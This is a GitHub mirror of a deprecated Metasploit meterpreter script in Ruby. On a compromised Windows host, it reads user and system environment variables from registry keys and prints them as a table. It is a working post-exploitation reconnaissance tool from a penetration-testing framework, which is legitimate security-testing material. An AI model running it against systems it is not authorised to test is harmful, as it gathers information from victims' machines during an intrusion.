mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
49 lines
1.4 KiB
Ruby
49 lines
1.4 KiB
Ruby
##
|
|
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
|
|
# If you'd like to imporve this script, please try to port it as a post
|
|
# module instead. Thank you.
|
|
##
|
|
|
|
|
|
#-------------------------------------------------------------------------------
|
|
#Options and Option Parsing
|
|
opts = Rex::Parser::Arguments.new(
|
|
"-h" => [ false, "Help menu." ]
|
|
)
|
|
var_names = []
|
|
var_names << registry_enumvals("HKEY_CURRENT_USER\\Volatile Environment")
|
|
var_names << registry_enumvals("HKEY_CURRENT_USER\\Environment")
|
|
var_names << registry_enumvals("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment")
|
|
|
|
def list_env_vars(var_names)
|
|
print_status("Getting all System and User Variables")
|
|
tbl = Rex::Ui::Text::Table.new(
|
|
'Header' => "Enviroment Variable list",
|
|
'Indent' => 1,
|
|
'Columns' =>
|
|
[
|
|
"Name",
|
|
"Value"
|
|
])
|
|
@client.sys.config.getenvs(*var_names.flatten).each do |k, v|
|
|
tbl << [k, v]
|
|
end
|
|
print("\n" + tbl.to_s + "\n")
|
|
end
|
|
|
|
opts.parse(args) { |opt, idx, val|
|
|
case opt
|
|
when "-h"
|
|
print_line "Meterpreter Script for extracting a list of all System and User environment variables."
|
|
print_line(opts.usage)
|
|
raise Rex::Script::Completed
|
|
|
|
end
|
|
}
|
|
if client.platform =~ /win32|win64/
|
|
list_env_vars(var_names)
|
|
else
|
|
print_error("This version of Meterpreter is not supported with this Script!")
|
|
raise Rex::Script::Completed
|
|
end
|